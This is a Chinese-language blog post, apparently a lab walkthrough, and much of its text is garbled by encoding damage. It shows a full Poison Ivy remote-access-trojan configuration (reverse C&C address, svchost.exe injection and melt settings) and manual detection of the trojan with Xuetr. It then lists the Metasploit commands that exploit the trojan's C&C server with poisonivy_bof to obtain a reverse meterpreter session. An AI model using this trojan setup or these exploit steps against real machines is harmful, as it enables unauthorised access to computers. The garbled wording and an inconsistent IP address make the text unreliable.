From&thx2:
http://badishi.com/poison-ivy-exploit-metasploit-module/
https://twitter.com/badishi
這個(gè)Exploit已經(jīng)集成在最新版本的Msf中了,老外的文章里也有源文件,可以修改后單獨(dú)提出來(lái).
 
首先為了模擬完整的環(huán)境,第一步是抓到已經(jīng)成為肉雞的電腦上反向連接的IP,這里順便介紹下簡(jiǎn)單ARK工具的使用及手工查馬的方法吧.
PI的反向連接配置,這里填的靜態(tài)IP

啟動(dòng)項(xiàng)及釋放目錄等,同時(shí)設(shè)定的插默認(rèn)瀏覽器和svchost.exe.

完整的配置信息如下:
- Connection
Connect to: 92.168.124.134:3460:0,
ID: test
Group:
Password: admin
Connect through proxy: No
- Install
ActiveX Startup: Yes
ActiveX Key: {344D13DD-52AF-DD3F-2A33-ED4792414430}
Copy File: Yes
File Name: svchost.exe
Copy File To: System Folder
Melt File: Yes
- Advanced
Process Mutex: )!VoqA.I4
Inject Server: Yes
Persistence: No
Inject into running process: Yes
Inject into: svchost.exe
Key Logger: No
Format: PE
File Alignment: 512
- Build
Icon: No
Execute Third-party Applications: No
在DEMO機(jī)器中運(yùn)行,然后上線了.

DEMO機(jī)器中手工用Xuetr查殺,手工查殺木馬的方法,對(duì)于Ring3層下的無(wú)非就是可疑進(jìn)程,可疑連接,可疑DLL模塊,可疑啟動(dòng)項(xiàng)(服務(wù)),等等這些了.這里直接參考建立的網(wǎng)絡(luò)連接.都能看到這里并沒(méi)有打開(kāi)IE卻有了IE的進(jìn)程,并且是已經(jīng)連接的狀態(tài)了.于是得到C&C的IP地址.

 
請(qǐng)出Msf黑火星的神器.

msf>search poisonivy
找到exp位置
msf>use /exploit/windows/misc/poisonivy_bof
設(shè)定使用exp
msf>show options
查看下設(shè)定,只要設(shè)定下遠(yuǎn)程IP(C&C服務(wù)器)地址就可以了.
msf>set RHOST 192.168.124.134
檢查下是否存在漏洞
msf>check
ok.. just exploit it!
msf>exploit
默認(rèn)會(huì)返回一個(gè)反連的meterpreter會(huì)話.

最后.測(cè)試了下全補(bǔ)丁版本的Windows 2k3 enterprise,可能因?yàn)镈EP和ALSR技術(shù)的原因,沒(méi)有完全bypass具體的原因沒(méi)有深入下去了.

最新評(píng)論